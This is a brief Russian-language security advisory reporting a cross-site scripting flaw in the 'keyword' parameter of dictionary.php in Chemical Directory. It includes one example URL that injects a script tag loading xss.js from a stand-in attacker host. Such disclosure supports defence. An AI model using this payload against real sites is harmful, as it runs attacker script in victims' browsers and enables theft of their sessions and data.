Программа: Chemical Directory

Уязвимость позволяет удаленному пользователю произвести XSS нападение. Уязвимость существует из-за недостаточной обработки входных данных в параметре "keyword" в сценарии dictionary.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

Пример:

http://www.example.com/dictionary.php?action=browse&keyword= e[SCRIPT SRC=http://evilsite.com/xss.js][/SCRIPT]



Оставить мнение